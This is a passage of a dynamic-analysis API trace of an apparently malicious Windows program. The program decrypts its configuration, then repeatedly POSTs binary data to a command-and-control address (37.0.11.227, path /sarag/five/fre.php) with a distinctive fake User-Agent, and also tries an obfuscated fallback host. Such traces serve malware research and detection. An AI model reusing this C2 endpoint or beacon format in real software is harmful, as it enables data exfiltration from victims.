phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0192.272] GetProcessHeap () returned 0x690000 [0192.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0192.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.273] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0192.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.274] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.275] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.275] GetProcessHeap () returned 0x690000 [0192.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0192.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.276] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0192.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.279] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0192.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.280] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0192.280] GetProcessHeap () returned 0x690000 [0192.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0192.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.282] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0192.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.283] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0192.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.284] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0192.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.285] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0192.285] GetProcessHeap () returned 0x690000 [0192.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0192.285] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2c18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb08*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0192.285] GetProcessHeap () returned 0x690000 [0192.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0192.285] socket (af=2, type=1, protocol=6) returned 0x3ac [0192.285] connect (s=0x3ac, name=0x6aeb08*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0192.407] FreeAddrInfoW (pAddrInfo=0x6b2c18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb08*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0192.407] GetProcessHeap () returned 0x690000 [0192.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0192.407] GetProcessHeap () returned 0x690000 [0192.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0192.408] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0192.409] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.409] GetProcessHeap () returned 0x690000 [0192.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0192.409] GetProcessHeap () returned 0x690000 [0192.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0192.410] GetProcessHeap () returned 0x690000 [0192.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0192.410] GetProcessHeap () returned 0x690000 [0192.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0192.413] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0192.415] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.415] GetProcessHeap () returned 0x690000 [0192.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0192.415] GetProcessHeap () returned 0x690000 [0192.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0192.546] send (s=0x3ac, buf=0x6abd08*, len=242, flags=0) returned 242 [0192.550] send (s=0x3ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0192.551] GetProcessHeap () returned 0x690000 [0192.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0192.551] recv (in: s=0x3ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0192.672] GetProcessHeap () returned 0x690000 [0192.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0192.673] GetProcessHeap () returned 0x690000 [0192.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0192.673] GetProcessHeap () returned 0x690000 [0192.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0192.673] GetProcessHeap () returned 0x690000 [0192.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0192.673] closesocket (s=0x3ac) returned 0 [0192.675] GetProcessHeap () returned 0x690000 [0192.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0192.675] GetProcessHeap () returned 0x690000 [0192.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0192.676] GetProcessHeap () returned 0x690000 [0192.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0192.676] GetProcessHeap () returned 0x690000 [0192.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0192.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1118) returned 0x3ac [0192.679] Sleep (dwMilliseconds=0xea60) [0192.680] GetProcessHeap () returned 0x690000 [0192.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0192.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.776] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0192.902] GetProcessHeap () returned 0x690000 [0192.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0192.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.911] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0192.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.912] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.913] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.913] GetProcessHeap () returned 0x690000 [0192.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0192.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.914] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0192.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.915] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0192.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.917] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0192.917] GetProcessHeap () returned 0x690000 [0192.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0192.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.919] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.920] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.921] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.923] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.923] GetProcessHeap () returned 0x690000 [0192.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0192.923] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.113] GetProcessHeap () returned 0x690000 [0193.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0193.113] GetProcessHeap () returned 0x690000 [0193.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0193.114] GetProcessHeap () returned 0x690000 [0193.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0193.114] GetProcessHeap () returned 0x690000 [0193.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0193.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0193.399] GetProcessHeap () returned 0x690000 [0193.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0193.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.401] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0193.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.404] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.404] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.404] GetProcessHeap () returned 0x690000 [0193.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0193.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.406] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0193.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.407] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0193.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.408] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0193.408] GetProcessHeap () returned 0x690000 [0193.408] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0193.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.408] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0193.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.409] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0193.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.410] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0193.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0193.411] GetProcessHeap () returned 0x690000 [0193.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0193.411] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2c68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0193.411] GetProcessHeap () returned 0x690000 [0193.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0193.412] socket (af=2, type=1, protocol=6) returned 0x3b0 [0193.412] connect (s=0x3b0, name=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0193.441] FreeAddrInfoW (pAddrInfo=0x6b2c68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0193.441] GetProcessHeap () returned 0x690000 [0193.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0193.441] GetProcessHeap () returned 0x690000 [0193.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0193.442] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0193.443] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.443] GetProcessHeap () returned 0x690000 [0193.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0193.443] GetProcessHeap () returned 0x690000 [0193.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0193.443] GetProcessHeap () returned 0x690000 [0193.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0193.443] GetProcessHeap () returned 0x690000 [0193.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0193.444] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0193.446] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.446] GetProcessHeap () returned 0x690000 [0193.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0193.446] GetProcessHeap () returned 0x690000 [0193.447] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0193.447] send (s=0x3b0, buf=0x6abd08*, len=242, flags=0) returned 242 [0193.448] send (s=0x3b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0193.448] GetProcessHeap () returned 0x690000 [0193.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0193.448] recv (in: s=0x3b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0193.518] GetProcessHeap () returned 0x690000 [0193.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0193.518] GetProcessHeap () returned 0x690000 [0193.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0193.518] GetProcessHeap () returned 0x690000 [0193.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0193.519] GetProcessHeap () returned 0x690000 [0193.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0193.519] closesocket (s=0x3b0) returned 0 [0193.519] GetProcessHeap () returned 0x690000 [0193.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0193.519] GetProcessHeap () returned 0x690000 [0193.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0193.521] GetProcessHeap () returned 0x690000 [0193.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0193.521] GetProcessHeap () returned 0x690000 [0193.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0193.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x111c) returned 0x3b0 [0193.526] Sleep (dwMilliseconds=0xea60) [0193.528] GetProcessHeap () returned 0x690000 [0193.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0193.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.529] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0193.564] GetProcessHeap () returned 0x690000 [0193.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0193.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.566] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0193.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.570] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.571] GetProcessHeap () returned 0x690000 [0193.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0193.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.582] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0193.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.584] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0193.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.585] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0193.585] GetProcessHeap () returned 0x690000 [0193.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0193.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.587] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.588] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.591] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.591] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.592] GetProcessHeap () returned 0x690000 [0193.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0193.592] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.592] GetProcessHeap () returned 0x690000 [0193.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0193.593] GetProcessHeap () returned 0x690000 [0193.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0193.593] GetProcessHeap () returned 0x690000 [0193.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0193.593] GetProcessHeap () returned 0x690000 [0193.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0193.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.601] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0193.613] GetProcessHeap () returned 0x690000 [0193.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0193.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.614] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0193.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.615] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0193.616] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.616] GetProcessHeap () returned 0x690000 [0193.617] HeapFree (in: 